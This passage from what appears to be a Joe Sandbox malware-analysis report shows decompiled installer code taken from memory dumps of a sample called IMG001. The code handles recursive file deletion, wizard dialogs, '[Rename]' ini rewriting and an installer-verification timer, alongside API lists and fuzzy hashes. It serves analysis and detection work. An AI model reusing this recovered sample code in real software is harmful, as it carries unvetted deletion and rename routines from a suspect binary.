					if( *_t72 != 0) {
						L10:
						lstrcatA(_t72, 0x409010);
						L11:
						_t70 =  &(_t72[lstrlenA(_t72)]);
						_t37 = FindFirstFileA(0x7b84b8,  &_v332);
						__eflags = _t37 - 0xffffffff;
						_a4 = _t37;
						if(_t37 == 0xffffffff) {
							L29:
							__eflags = _v8;
							if(_v8 != 0) {
								_t31 = _t70 - 1;
								 *_t31 =  *(_t70 - 1) & 0x00000000;
								__eflags =  *_t31;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t75 =  &(_v332.cFileName);
							_t49 = E0040550E( &(_v332.cFileName), 0x3f);
							__eflags =  *_t49;
							if( *_t49 != 0) {
								__eflags = _v332.cAlternateFileName;
								if(_v332.cAlternateFileName != 0) {
									_t75 =  &(_v332.cAlternateFileName);
								}
							}
							__eflags =  *_t75 - 0x2e;
							if( *_t75 != 0x2e) {
								L19:
								E004059F0(_t70, _t75);
								__eflags = _v332.dwFileAttributes & 0x00000010;
								if((_v332.dwFileAttributes & 0x00000010) == 0) {
									E004056A8(_t72);
									_t52 = DeleteFileA(_t72);
									__eflags = _t52;
									if(_t52 != 0) {
										E00404D8E(0xfffffff2, _t72);
									} else {
										__eflags = _a8 & 0x00000004;
										if((_a8 & 0x00000004) == 0) {
											 *0x7c5728 =  *0x7c5728 + 1;
										} else {
											E00404D8E(0xfffffff1, _t72);
											_push(0);
											_push(_t72);
											E0040573E();
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405315(_t70, __eflags, _t72, _a8);
									}
								}
								goto L27;
							}
							_t61 =  *((intOrPtr*)(_t75 + 1));
							__eflags = _t61;
							if(_t61 == 0) {
								goto L27;
							}
							__eflags = _t61 - 0x2e;
							if(_t61 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t75 + 2));
							if( *((char*)(_t75 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t55 = FindNextFileA(_a4,  &_v332);
							__eflags = _t55;
						} while (_t55 != 0);
						_t37 = FindClose(_a4);
						goto L29;
					}
					__eflags =  *0x7b84b8 - 0x5c;
					if( *0x7b84b8 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t37;
					if(_t37 == 0) {
						L31:
						__eflags = _v8;
						if(_v8 == 0) {
							L39:
							return _t37;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t37 = E00405CEB(_t72);
							__eflags = _t37;
							if(_t37 == 0) {
								goto L39;
							}
							E004054E3(_t72);
							E004056A8(_t72);
							_t37 = RemoveDirectoryA(_t72);
							__eflags = _t37;
							if(_t37 != 0) {
								return E00404D8E(0xffffffe5, _t72);
							}
							__eflags = _a8 & 0x00000004;
							if((_a8 & 0x00000004) == 0) {
								goto L33;
							}
							E00404D8E(0xfffffff1, _t72);
							_push(0);
							_push(_t72);
							return E0040573E();
						}
						L33:
						 *0x7c5728 =  *0x7c5728 + 1;
						return _t37;
					}
					__eflags = _a8 & 0x00000002;
					if((_a8 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}

APIs

DeleteFileA.KERNEL32(?,?,007EE000,00000000), ref: 00405333
lstrcatA.KERNEL32(007B84B8,\*.*,007B84B8,?,00000000,?,007EE000,00000000), ref: 0040537D
lstrcatA.KERNEL32(?,00409010,?,007B84B8,?,00000000,?,007EE000,00000000), ref: 0040539E
lstrlenA.KERNEL32(?,?,00409010,?,007B84B8,?,00000000,?,007EE000,00000000), ref: 004053A4
FindFirstFileA.KERNEL32(007B84B8,?,?,?,00409010,?,007B84B8,?,00000000,?,007EE000,00000000), ref: 004053B5
FindNextFileA.KERNEL32(?,00000010,000000F2,?), ref: 00405467
FindClose.KERNEL32(?), ref: 00405478

Strings

\*.*, xrefs: 00405377

Memory Dump Source

Source File: 0000001A.00000002.272018747.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001A.00000002.272006337.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001A.00000002.272026682.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000001A.00000002.272037031.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272044814.000000000040B000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272049498.000000000040D000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272057902.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272068363.0000000000413000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272133807.0000000000783000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272141221.0000000000788000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272154119.000000000078D000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272161383.000000000078F000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272194145.00000000007BD000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272208934.00000000007DA000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272226018.0000000000806000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_IMG001.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: \*.*
API String ID: 2035342205-1173974218
Opcode ID: 24ada9ff7337345965a0f49e05d7d16f5ef344ee665e6ab09e187fbc7306ff31
Instruction ID: a3bd02508b0b95f8a0c7cde32addaa27e2f8db40fee80c7c76cb9bfc506cccd8
Opcode Fuzzy Hash: 24ada9ff7337345965a0f49e05d7d16f5ef344ee665e6ab09e187fbc7306ff31
Instruction Fuzzy Hash: F351B030904A44AACB216B219C45BFF3B68DF42765F14817FFD01751D2D77C49819F6A

Uniqueness

Uniqueness Score: -1.00%

Function 004038CF, Relevance: 48.3, APIs: 32, Instructions: 345
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E004038CF(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				struct HWND__* _t49;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t115;
				signed int _t116;
				int _t117;
				signed int _t122;
				struct HWND__* _t125;
				struct HWND__* _t126;
				int _t127;
				long _t130;
				int _t132;
				int _t133;
				void* _t134;

				_t115 = _a8;
				if(_t115 == 0x110 || _t115 == 0x408) {
					_t35 = _a12;
					_t125 = _a4;
					__eflags = _t115 - 0x110;
					 *0x7b0494 = _t35;
					if(_t115 == 0x110) {
						 *0x7c56a8 = _t125;
						 *0x7b04a8 = GetDlgItem(_t125, 1);
						_t91 = GetDlgItem(_t125, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x7a8470 = _t91;
						E00403DA2(_t125);
						SetClassLongA(_t125, 0xfffffff2,  *0x7c1688);
						 *0x7c166c = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x7b0494 = 1;
					}
					_t122 =  *0x4091a4; // 0xffffffff
					_t133 = 0;
					_t130 = (_t122 << 6) +  *0x7c56c0;
					__eflags = _t122;
					if(_t122 < 0) {
						L34:
						E00403DEE(0x40b);
						while(1) {
							_t37 =  *0x7b0494;
							 *0x4091a4 =  *0x4091a4 + _t37;
							_t130 = _t130 + (_t37 << 6);
							_t39 =  *0x4091a4; // 0xffffffff
							__eflags = _t39 -  *0x7c56c4;
							if(_t39 ==  *0x7c56c4) {
								E0040140B(1);
							}
							__eflags =  *0x7c166c - _t133;
							if( *0x7c166c != _t133) {
								break;
							}
							__eflags =  *0x4091a4 -  *0x7c56c4; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t116 =  *(_t130 + 0x14);
							E00405A12(_t116, _t125, _t130, 0x802000,  *((intOrPtr*)(_t130 + 0x24)));
							_push( *((intOrPtr*)(_t130 + 0x20)));
							_push(0xfffffc19);
							E00403DA2(_t125);
							_push( *((intOrPtr*)(_t130 + 0x1c)));
							_push(0xfffffc1b);
							E00403DA2(_t125);
							_push( *((intOrPtr*)(_t130 + 0x28)));
							_push(0xfffffc1a);
							E00403DA2(_t125);
							_t49 = GetDlgItem(_t125, 3);
							__eflags =  *0x7c572c - _t133;
							_v32 = _t49;
							if( *0x7c572c != _t133) {
								_t116 = _t116 & 0x0000fefd | 0x00000004;
								__eflags = _t116;
							}
							ShowWindow(_t49, _t116 & 0x00000008);
							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
							E00403DC4(_t116 & 0x00000002);
							_t117 = _t116 & 0x00000004;
							EnableWindow( *0x7a8470, _t117);
							__eflags = _t117 - _t133;
							if(_t117 == _t133) {
								_push(1);
							} else {
								_push(_t133);
							}
							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
							__eflags =  *0x7c572c - _t133;
							if( *0x7c572c == _t133) {
								_push( *0x7b04a8);
							} else {
								SendMessageA(_t125, 0x401, 2, _t133);
								_push( *0x7a8470);
							}
							E00403DD7();
							E004059F0(0x7b04b0, 0x7c16a0);
							E00405A12(0x7b04b0, _t125, _t130,  &(0x7b04b0[lstrlenA(0x7b04b0)]),  *((intOrPtr*)(_t130 + 0x18)));
							SetWindowTextA(_t125, 0x7b04b0);
							_push(_t133);
							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t130 - _t133;
								if( *_t130 == _t133) {
									continue;
								}
								__eflags =  *(_t130 + 4) - 5;
								if( *(_t130 + 4) != 5) {
									DestroyWindow( *0x7c1678);
									 *0x7ac480 = _t130;
									__eflags =  *_t130 - _t133;
									if( *_t130 <= _t133) {
										goto L58;
									}
									_t73 = CreateDialogParamA( *0x7c56a0,  *_t130 +  *0x7c1680 & 0x0000ffff, _t125,  *(0x4091a8 +  *(_t130 + 4) * 4), _t130);
									__eflags = _t73 - _t133;
									 *0x7c1678 = _t73;
									if(_t73 == _t133) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t130 + 0x2c)));
									_push(6);
									E00403DA2(_t73);
									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
									ScreenToClient(_t125, _t134 + 0x10);
									SetWindowPos( *0x7c1678, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
									_push(_t133);
									E00401389( *((intOrPtr*)(_t130 + 0xc)));
									__eflags =  *0x7c166c - _t133;
									if( *0x7c166c != _t133) {
										goto L61;
									}
									ShowWindow( *0x7c1678, 8);
									E00403DEE(0x405);
									goto L58;
								}
								__eflags =  *0x7c572c - _t133;
								if( *0x7c572c != _t133) {
									goto L61;
								}
								__eflags =  *0x7c5720 - _t133;
								if( *0x7c5720 != _t133) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x7c1678);
						 *0x7c56a8 = _t133;
						EndDialog(_t125,  *0x7aa478);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t130 - _t133;
							if( *_t130 == _t133) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L33;
						}
						SendMessageA( *0x7c1678, 0x40f, 0, 1);
						__eflags =  *0x7c166c;
						return 0 |  *0x7c166c == 0x00000000;
					}
				} else {
					_t125 = _a4;
					_t133 = 0;
					if(_t115 == 0x47) {
						SetWindowPos( *0x7b0488, _t125, 0, 0, 0, 0, 0x13);
					}
					if(_t115 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x7b0488,  ~(_a12 - 1) & _t115);
					}
					if(_t115 != 0x40d) {
						__eflags = _t115 - 0x11;
						if(_t115 != 0x11) {
							__eflags = _t115 - 0x111;
							if(_t115 != 0x111) {
								L26:
								return L00403E09(_t115, _a12, _a16);
							}
							_t132 = _a12 & 0x0000ffff;
							_t126 = GetDlgItem(_t125, _t132);
							__eflags = _t126 - _t133;
							if(_t126 == _t133) {
								L13:
								__eflags = _t132 - 1;
								if(_t132 != 1) {
									__eflags = _t132 - 3;
									if(_t132 != 3) {
										_t127 = 2;
										__eflags = _t132 - _t127;
										if(_t132 != _t127) {
											L25:
											SendMessageA( *0x7c1678, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x7c572c - _t133;
										if( *0x7c572c == _t133) {
											_t99 = E0040140B(3);
											__eflags = _t99;
											if(_t99 != 0) {
												goto L26;
											}
											 *0x7aa478 = 1;
											L21:
											_push(0x78);
											L22:
											E00403D7B();
											goto L26;
										}
										E0040140B(_t127);
										 *0x7aa478 = _t127;
										goto L21;
									}
									__eflags =  *0x4091a4 - _t133; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t132);
								goto L22;
							}
							SendMessageA(_t126, 0xf3, _t133, _t133);
							_t103 = IsWindowEnabled(_t126);
							__eflags = _t103;
							if(_t103 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t125, _t133, _t133);
						return 1;
					} else {
						DestroyWindow( *0x7c1678);
						 *0x7c1678 = _a12;
						L58:
						if( *0x7b84b0 == _t133 &&  *0x7c1678 != _t133) {
							ShowWindow(_t125, 0xa);
							 *0x7b84b0 = 1;
						}
						L61:
						return 0;
					}
				}
			}

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 0040390B
ShowWindow.USER32(?), ref: 00403928
DestroyWindow.USER32 ref: 0040393C
SetWindowLongA.USER32 ref: 00403958
GetDlgItem.USER32 ref: 00403979
SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 0040398D
IsWindowEnabled.USER32(00000000), ref: 00403994
GetDlgItem.USER32 ref: 00403A42
GetDlgItem.USER32 ref: 00403A4C
SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403A66
SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403AB7
GetDlgItem.USER32 ref: 00403B5D
ShowWindow.USER32(00000000,?), ref: 00403B7E
EnableWindow.USER32(?,?), ref: 00403B90
EnableWindow.USER32(?,?), ref: 00403BAB
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403BC1
EnableMenuItem.USER32 ref: 00403BC8
SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403BE0
SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403BF3
lstrlenA.KERNEL32(007B04B0,?,007B04B0,007C16A0), ref: 00403C1C
SetWindowTextA.USER32(?,007B04B0), ref: 00403C2B
ShowWindow.USER32(?,0000000A), ref: 00403D5F

Memory Dump Source

Source File: 0000001A.00000002.272018747.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001A.00000002.272006337.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001A.00000002.272026682.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000001A.00000002.272037031.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272044814.000000000040B000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272049498.000000000040D000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272057902.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272068363.0000000000413000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272133807.0000000000783000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272141221.0000000000788000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272154119.000000000078D000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272161383.000000000078F000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272194145.00000000007BD000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272208934.00000000007DA000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272226018.0000000000806000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_IMG001.jbxd

Similarity

API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
String ID:
API String ID: 184305955-0
Opcode ID: 4a61885d911feefb6f79ed82dae61af64a62622e157ad16d97c371e073bd281d
Instruction ID: 844fe8c9d5e64a327b0a20496c5cf27aed03d28131746735177e2461b2ae32ce
Opcode Fuzzy Hash: 4a61885d911feefb6f79ed82dae61af64a62622e157ad16d97c371e073bd281d
Instruction Fuzzy Hash: 93C19C71A04204AFDB206F21ED85E2B3F6CEB45706F44453EF641B52E1CB7DA9819B2E

Uniqueness

Uniqueness Score: -1.00%

Function 0040573E, Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 144
filememoryCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0040573E() {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t15;
				long _t16;
				int _t20;
				void* _t28;
				long _t29;
				intOrPtr* _t37;
				int _t43;
				void* _t44;
				long _t47;
				CHAR* _t49;
				void* _t51;
				void* _t53;
				intOrPtr* _t54;
				void* _t55;
				void* _t56;

				_t15 = E00405D12(1);
				_t49 =  *(_t55 + 0x18);
				if(_t15 != 0) {
					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
					if(_t20 != 0) {
						L16:
						 *0x7c5730 =  *0x7c5730 + 1;
						return _t20;
					}
				}
				 *0x7bce40 = 0x4c554e;
				if(_t49 == 0) {
					L5:
					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x7bc8b8, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						_t43 = wsprintfA(0x7bc4b8, "%s=%s\r\n", 0x7bce40, 0x7bc8b8);
						_t56 = _t55 + 0x10;
						E00405A12(_t43, 0x400, 0x7bc8b8, 0x7bc8b8,  *((intOrPtr*)( *0x7c56b0 + 0x128)));
						_t20 = E004056C7(0x7bc8b8, 0xc0000000, 4);
						_t53 = _t20;
						 *(_t56 + 0x14) = _t53;
						if(_t53 == 0xffffffff) {
							goto L16;
						}
						_t47 = GetFileSize(_t53, 0);
						_t7 = _t43 + 0xa; // 0xa
						_t51 = GlobalAlloc(0x40, _t47 + _t7);
						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
							L15:
							_t20 = CloseHandle(_t53);
							goto L16;
						} else {
							if(E0040563C(_t51, "[Rename]\r\n") != 0) {
								_t28 = E0040563C(_t26 + 0xa, 0x409330);
								if(_t28 == 0) {
									L13:
									_t29 = _t47;
									L14:
									E00405688(_t51 + _t29, 0x7bc4b8, _t43);
									SetFilePointer(_t53, 0, 0, 0);
									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
									GlobalFree(_t51);
									goto L15;
								}
								_t37 = _t28 + 1;
								_t44 = _t51 + _t47;
								_t54 = _t37;
								if(_t37 >= _t44) {
									L21:
									_t53 =  *(_t56 + 0x14);
									_t29 = _t37 - _t51;
									goto L14;
								} else {
									goto L20;
								}
								do {
									L20:
									 *((char*)(_t43 + _t54)) =  *_t54;
									_t54 = _t54 + 1;
								} while (_t54 < _t44);
								goto L21;
							}
							E004059F0(_t51 + _t47, "[Rename]\r\n");
							_t47 = _t47 + 0xa;
							goto L13;
						}
					}
				} else {
					CloseHandle(E004056C7(_t49, 0, 1));
					_t16 = GetShortPathNameA(_t49, 0x7bce40, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						goto L5;
					}
				}
				return _t16;
			}

APIs

Part of subcall function 00405D12: GetModuleHandleA.KERNEL32(?,?,00000000,00403121,00000008), ref: 00405D24
Part of subcall function 00405D12: LoadLibraryA.KERNELBASE(?,?,00000000,00403121,00000008), ref: 00405D2F
Part of subcall function 00405D12: GetProcAddress.KERNEL32(00000000,?), ref: 00405D40

CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000001,?,00000000,?,?,004054D3,?,00000000,000000F1,?), ref: 0040578B
GetShortPathNameA.KERNEL32 ref: 00405794
GetShortPathNameA.KERNEL32 ref: 004057B1
wsprintfA.USER32 ref: 004057CF
GetFileSize.KERNEL32(00000000,00000000,007BC8B8,C0000000,00000004,007BC8B8,?,?,?,00000000,000000F1,?), ref: 0040580A
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 00405819
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 0040582F
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,007BC4B8,00000000,-0000000A,00409330,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405875
WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 00405887
GlobalFree.KERNEL32 ref: 0040588E
CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 00405895

Part of subcall function 0040563C: lstrlenA.KERNEL32(00000000,?,00000000,00000000,0040584A,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405643
Part of subcall function 0040563C: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,0040584A,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405673

Strings

[Rename], xrefs: 0040583F, 00405851
%s=%s, xrefs: 004057C5

Memory Dump Source

Source File: 0000001A.00000002.272018747.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001A.00000002.272006337.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001A.00000002.272026682.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000001A.00000002.272037031.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272044814.000000000040B000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272049498.000000000040D000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272057902.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272068363.0000000000413000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272133807.0000000000783000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272141221.0000000000788000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272154119.000000000078D000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272161383.000000000078F000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272194145.00000000007BD000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272208934.00000000007DA000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272226018.0000000000806000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_IMG001.jbxd

Similarity

API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeLibraryLoadModulePointerProcReadSizeWritewsprintf
String ID: %s=%s$[Rename]
API String ID: 3772915668-1727408572
Opcode ID: 11cba2204838a82524e086cb36a27bb1f651aff521618a1f3f6d53a001441ec3
Instruction ID: 68e1e79a5e3aa16c535a31722805a41b57947565a1a8d7e540e025e6bd358360
Opcode Fuzzy Hash: 11cba2204838a82524e086cb36a27bb1f651aff521618a1f3f6d53a001441ec3
Instruction Fuzzy Hash: FA41E072604B11ABE7217B619C49FAB3A5CEF45714F04843AFD05F62D2E63DA8018EBD

Uniqueness

Uniqueness Score: -1.00%

Function 00404D8E, Relevance: 10.6, APIs: 7, Instructions: 73
stringwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404D8E(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x7c1684;
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x7c5754;
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E00405A12(0, _t39, 0x7ac488, 0x7ac488, _a4);
					}
					_t26 = lstrlenA(0x7ac488);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x7c1668, 0x7ac488);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x7ac488;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x7ac488)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x4000) {
							_t26 = lstrcatA(0x7ac488, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

APIs

lstrlenA.KERNEL32(007AC488,00000000,0079D058,00792458,?,?,?,?,?,?,?,?,?,00402F95,00000000,?), ref: 00404DC7
lstrlenA.KERNEL32(00402F95,007AC488,00000000,0079D058,00792458,?,?,?,?,?,?,?,?,?,00402F95,00000000), ref: 00404DD7
lstrcatA.KERNEL32(007AC488,00402F95,00402F95,007AC488,00000000,0079D058,00792458), ref: 00404DEA
SetWindowTextA.USER32(007AC488,007AC488), ref: 00404DFC
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404E22
SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E3C
SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E4A

Memory Dump Source

Source File: 0000001A.00000002.272018747.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001A.00000002.272006337.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001A.00000002.272026682.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000001A.00000002.272037031.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272044814.000000000040B000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272049498.000000000040D000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272057902.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272068363.0000000000413000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272133807.0000000000783000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272141221.0000000000788000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272154119.000000000078D000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272161383.000000000078F000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272194145.00000000007BD000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272208934.00000000007DA000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272226018.0000000000806000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_400000_IMG001.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: f720b70b0d635ca1f57644a8a0ea65d2b1c6a45dffdce1030f6556ee864f39e1
Instruction ID: 47d110ac8a5d848b8360d243fd416ef82f1fc4428da79922e5b1b26d8c92823d
Opcode Fuzzy Hash: f720b70b0d635ca1f57644a8a0ea65d2b1c6a45dffdce1030f6556ee864f39e1
Instruction Fuzzy Hash: C82190B1900148BBDB019FA5DD80EDEBFB9EF45354F14807AF604B6291C6388E809FA8

Uniqueness

Uniqueness Score: -1.00%

Function 00402B3B, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402B3B(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x792454; // 0x363211
					_t11 =  *0x7a6460; // 0x363215
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfA( &_v68, "verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}

0x00402b48
0x00402b56
0x00402b5c
0x00402b5c
0x00402b6a
0x00402b6c
0x00402b72
0x00402b79
0x00402b7b
0x00402b7b
0x00402b91
0x00402ba1
0x00402bb3
0x00402bb3
0x00402bbb

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B56
MulDiv.KERNEL32(00363211,00000064,00363215), ref: 00402B81
wsprintfA.USER32 ref: 00402B91
SetWindowTextA.USER32(?,?), ref: 00402BA1
SetDlgItemTextA.USER32 ref: 00402BB3

Strings

verifying installer: %d%%, xrefs: 00402B8B

Memory Dump Source

Source File: 0000001A.00000002.272018747.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001A.00000002.272006337.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000001A.00000002.272026682.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000001A.00000002.272037031.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272044814.000000000040B000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272049498.000000000040D000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272057902.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272068363.0000000000413000.00000004.00020000.sdmp Download File
Associated: 0000001A.00000002.272133807.0000000000783000.00000004.00020000.sdmp Download File
